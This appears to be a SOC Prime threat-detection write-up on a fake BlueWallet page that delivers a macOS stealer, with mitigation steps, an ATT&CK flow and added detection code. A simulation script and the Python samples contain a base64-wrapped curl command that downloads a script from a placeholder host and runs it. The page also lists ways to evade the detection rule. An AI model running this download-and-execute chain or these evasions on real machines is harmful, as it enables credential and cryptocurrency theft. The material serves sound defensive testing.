SOC Prime Bias: Medium

04 Jun 2026 14:59 UTC

Fake BlueWallet steals passwords, accounts, and crypto from Macs

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

Attackers are using a fake BlueWallet download page to distribute a malicious AppleScript file targeting macOS users. Once executed, the script launches a Base64-encoded shell command that retrieves a second-stage payload from a remote server. That payload steals browser data, cryptocurrency wallet files, password manager databases, cloud credentials, and clipboard contents, then sends the collected information to the attackers through a Telegram bot.

Investigation

The first stage is a small AppleScript file named BlueWallet Installer.applescript that decodes and runs a curl command to fetch a hidden script called /tmp/.sysupd.sh. The second-stage script creates a randomized working directory, gathers data from multiple applications, and uses a Telegram bot for both command-and-control and exfiltration. Persistence is established through a LaunchAgent plist dropped into the user’s ~/Library/LaunchAgents directory.

Mitigation

Users should avoid opening unknown AppleScript files and carefully verify the legitimacy of cryptocurrency wallet download pages before installing anything. Organizations should restrict script execution from untrusted sources, monitor for hidden files created in /tmp, and watch for suspicious LaunchAgent entries. Outbound connections to known malicious infrastructure should be blocked. If compromise is suspected, passwords should be changed immediately and cryptocurrency seed phrases rotated.

Response

If infection is suspected, disconnect the affected macOS system from the network, collect forensic artifacts such as the LaunchAgent plist and /tmp/.sysupd.sh, and remove all malicious files. Reset any compromised credentials, revoke exposed SSH and cloud keys, and review Telegram-related activity for signs of continued attacker control. If full cleanup cannot be confidently confirmed, reinstall macOS from a trusted source.
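As an added example (not part of the SOC Prime write-up), the following Python audit implements the LaunchAgent check that the investigation and mitigation sections call for: it parses each plist in a LaunchAgents directory and flags agents that run a hidden script out of /tmp at login. The plist contents, the `com.example.*` labels and the function names are constructed for illustration; the real agent's label is not given on the page.

```python
import os
import plistlib
import tempfile

# World-writable scratch locations a persistent agent should never execute from.
TEMP_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/")

def audit_launch_agent(plist_path):
    """Return the reasons a LaunchAgent plist looks suspicious; an empty list means clean."""
    with open(plist_path, "rb") as fh:
        plist = plistlib.load(fh)
    argv = list(plist.get("ProgramArguments", []))
    if plist.get("Program"):
        argv.insert(0, plist["Program"])
    reasons = []
    for arg in argv:
        if not isinstance(arg, str):
            continue
        if arg.startswith(TEMP_DIRS):
            reasons.append(f"executes from a world-writable temp directory: {arg}")
        if os.path.basename(arg).startswith("."):
            reasons.append(f"references a hidden file: {arg}")
        if "base64" in arg or "do shell script" in arg:
            reasons.append(f"inline decoding or AppleScript shell bridge: {arg}")
    if reasons and plist.get("RunAtLoad"):
        reasons.append("RunAtLoad is set, so it re-executes at every login")
    return reasons

def audit_agents_dir(agents_dir):
    """Audit every .plist in a LaunchAgents directory; returns {filename: reasons} for flagged ones."""
    flagged = {}
    for entry in os.scandir(agents_dir):
        if entry.is_file() and entry.name.endswith(".plist"):
            try:
                reasons = audit_launch_agent(entry.path)
            except Exception:  # malformed or unreadable plist is itself worth a look
                reasons = ["plist could not be parsed"]
            if reasons:
                flagged[entry.name] = reasons
    return flagged

def demo_audit():
    """Write two constructed plists (one mimicking the described persistence, one benign) and audit them."""
    directory = tempfile.mkdtemp()
    malicious = {"Label": "com.example.sysupd",  # placeholder label, not the real one
                 "ProgramArguments": ["/bin/sh", "/tmp/.sysupd.sh"], "RunAtLoad": True}
    benign = {"Label": "com.example.backup",
              "ProgramArguments": ["/usr/local/bin/backup", "--daily"], "RunAtLoad": True}
    for name, data in (("com.example.sysupd.plist", malicious), ("com.example.backup.plist", benign)):
        with open(os.path.join(directory, name), "wb") as fh:
            plistlib.dump(data, fh)
    return audit_agents_dir(directory)
```

Point `audit_agents_dir` at `~/Library/LaunchAgents` (and `/Library/LaunchAgents`) on a suspect host; `demo_audit()` only exercises the logic on the constructed samples.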

Attack Flow

    graph TB
    %% Class definitions
    classDef technique fill:#99ccff
    classDef artifact fill:#ffdd99
    %% Node definitions
    drive_by["<b>Technique</b> – T1189 Drive-by Compromise<br/><b>Description</b>: Malicious website causes the victim to download a payload."]
    class drive_by technique
    user_exec["<b>Technique</b> – T1204.002 User Execution<br/><b>Description</b>: Victim runs a downloaded AppleScript file."]
    class user_exec technique
    applescript_interp["<b>Technique</b> – T1059.002 Command and Scripting Interpreter: AppleScript<br/><b>Description</b>: AppleScript runs a base64-encoded curl command."]
    class applescript_interp technique
    obfuscation["<b>Technique</b> – T1027.008 Obfuscated Files or Information<br/><b>Description</b>: Payload strings are encoded with base64 and XOR."]
    class obfuscation technique
    masquerade["<b>Technique</b> – T1036.003 Masquerading<br/><b>Description</b>: Files named 'BlueWallet Installer.applescript' and '.sysupd.sh' to appear legitimate."]
    class masquerade technique
    launchctl["<b>Technique</b> – T1569.001 System Services: Launchctl<br/><b>Description</b>: Launchctl executes a second-stage script."]
    class launchctl technique
    persistence["<b>Technique</b> – T1543.001 Persistence: Launch Agent<br/><b>Description</b>: Plist placed in ~/Library/LaunchAgents for auto-start."]
    class persistence technique
    tcc_manip["<b>Technique</b> – T1548.006 Abuse Elevation Control Mechanism: TCC Manipulation<br/><b>Description</b>: Fake System Preferences dialog to obtain user consent."]
    class tcc_manip technique
    gui_capture["<b>Technique</b> – T1056.002 Input Capture: GUI<br/><b>Description</b>: Captures entered macOS password."]
    class gui_capture technique
    browser_collect["<b>Technique</b> – T1217 Collection: Browser Information Discovery<br/><b>Description</b>: Harvests browser data such as cookies and history."]
    class browser_collect technique
    clipboard_collect["<b>Technique</b> – T1115 Collection: Clipboard Data<br/><b>Description</b>: Replaces cryptocurrency addresses on the clipboard."]
    class clipboard_collect technique
    host_info["<b>Technique</b> – T1592.002 Gather Victim Host Information: Software<br/><b>Description</b>: Enumerates wallets, password managers and cloud credentials."]
    class host_info technique
    %% Connections
    drive_by -->|leads_to| user_exec
    user_exec -->|leads_to| applescript_interp
    applescript_interp -->|creates| obfuscation
    applescript_interp -->|creates| masquerade
    obfuscation -->|enables| launchctl
    launchctl -->|establishes| persistence
    persistence -->|triggers| tcc_manip
    tcc_manip -->|captures| gui_capture
    launchctl -->|collects| browser_collect
    launchctl -->|collects| clipboard_collect
    launchctl -->|collects| host_info

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    An attacker crafts a malicious AppleScript that embeds a base64‑encoded payload. The payload, once decoded, downloads a secondary script (/tmp/.sysupd.sh) from a remote C2 server and executes it. The attacker launches this AppleScript via Script Editor (or osascript), leveraging the legitimate macOS “one‑line base64 do shell script” pattern that the rule monitors.

  • Regression Test Script:

    #!/bin/bash
    # -------------------------------------------------
    # Simulate Fake BlueWallet AppleScript execution
    # -------------------------------------------------
    
    # 1. Build the malicious base64 payload
    #    The payload: curl -s http://malicious.example.com/payload.sh -o /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh
    MALICIOUS_PAYLOAD='curl -s http://malicious.example.com/payload.sh -o /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh'
    #    tr strips the line wrapping GNU base64 adds, so the blob stays a single token
    B64_PAYLOAD=$(printf "%s" "$MALICIOUS_PAYLOAD" | base64 | tr -d '\n')
    
    # 2. Execute via osascript (AppleScript "do shell script" bridge)
    #    The inner double quotes are escaped so the AppleScript string literal survives bash quoting
    osascript -e "do shell script \"echo $B64_PAYLOAD | base64 -d > /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh\""
    
    # End of script
  • Cleanup Commands:

    #!/bin/bash
    # Remove the malicious script and any residual artifacts
    rm -f /tmp/.sysupd.sh
    # Optionally clear AppleScript history (not required for detection)

Post‑Execution Verification

  1. Alert Confirmation: Query the SIEM for alerts generated by the rule ID 4294bac4-37cf-434e-ba7d-18910d23b830. Example KQL:

    SecurityAlert
    | where AlertName contains "Fake BlueWallet Malware Execution"
    | where Severity == "High"
    | project TimeGenerated, Computer, AlertName, Description
  2. Evasion Test: Re‑run the Regression Test Script after renaming the temp file to /tmp/.sysupd_alt.sh. Verify that no alert is generated, confirming the rule’s dependence on the literal path.


Conclusions

  • The detection rule correctly identifies the exact command‑line pattern it was written for.
  • Its narrow focus makes it easily bypassable by simple evasion techniques (file‑name changes, separating the base64 payload, using osascript directly).
  • Enhancements such as fuzzy matching for base64‑decode patterns, monitoring any script written to /tmp with executable permissions, and correlating network download activity will improve coverage.
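As an added example (not the SOC Prime rule and not code from the page), the following Python sketches the broader detection the conclusions call for: it inspects process command lines for the AppleScript shell bridge, an inline base64 decode and a hidden file under a temp directory regardless of its name, and decodes any embedded base64 to look for download-and-execute behaviour. The sample command lines, the example.com URL and the function names are constructed for illustration.

```python
import base64
import re

B64_DECODE_RE = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")      # any decode flag, not a literal path
B64_BLOB_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")                # long base64 runs worth decoding
HIDDEN_TMP_RE = re.compile(r"/(?:private/)?(?:var/)?tmp/\.[^\s/]+")  # dot-file under /tmp or /var/tmp
DOWNLOAD_EXEC = ("curl ", "wget ", "chmod +x", "/tmp/", "/var/tmp/")  # download-and-execute markers

def decoded_blobs(cmdline):
    """Decode every long base64 run in a command line; skip anything that is not valid text."""
    out = []
    for blob in B64_BLOB_RE.findall(cmdline):
        try:
            out.append(base64.b64decode(blob, validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue
    return out

def indicators(cmdline):
    """Return the behavioural indicators present in one process command line."""
    found = []
    if "do shell script" in cmdline:
        found.append("AppleScript-to-shell bridge")
    if B64_DECODE_RE.search(cmdline):
        found.append("inline base64 decode")
    if HIDDEN_TMP_RE.search(cmdline):
        found.append("hidden file under a temp directory")
    for text in decoded_blobs(cmdline):
        hits = [k.strip() for k in DOWNLOAD_EXEC if k in text]
        if hits:
            found.append("decoded payload contains: " + ", ".join(hits))
    return found

def is_alert(cmdline):
    """Alert on download-and-execute inside a decoded blob, or on two or more indicators together."""
    found = indicators(cmdline)
    return any(f.startswith("decoded payload") for f in found) or len(found) >= 2

# Constructed sample telemetry: the regression pattern, the two evasions named above, and benign noise.
PAYLOAD = "curl -s http://malicious.example.com/payload.sh -o /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh"
B64 = base64.b64encode(PAYLOAD.encode()).decode()
SAMPLE_EVENTS = {
    "original": f"osascript -e 'do shell script \"echo {B64} | base64 -d > /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh\"'",
    "renamed": f"osascript -e 'do shell script \"echo {B64} | base64 -d > /tmp/.sysupd_alt.sh && sh /tmp/.sysupd_alt.sh\"'",
    "direct_shell": f"sh -c 'echo {B64} | base64 -D | sh'",
    "benign_notify": "osascript -e 'display notification \"Build finished\"'",
    "benign_cert": "base64 -d server.crt.b64 > server.crt",
}
```

Run `indicators()` over each entry of `SAMPLE_EVENTS` to see why the renamed and direct-shell variants still fire while the two benign commands stay below the threshold.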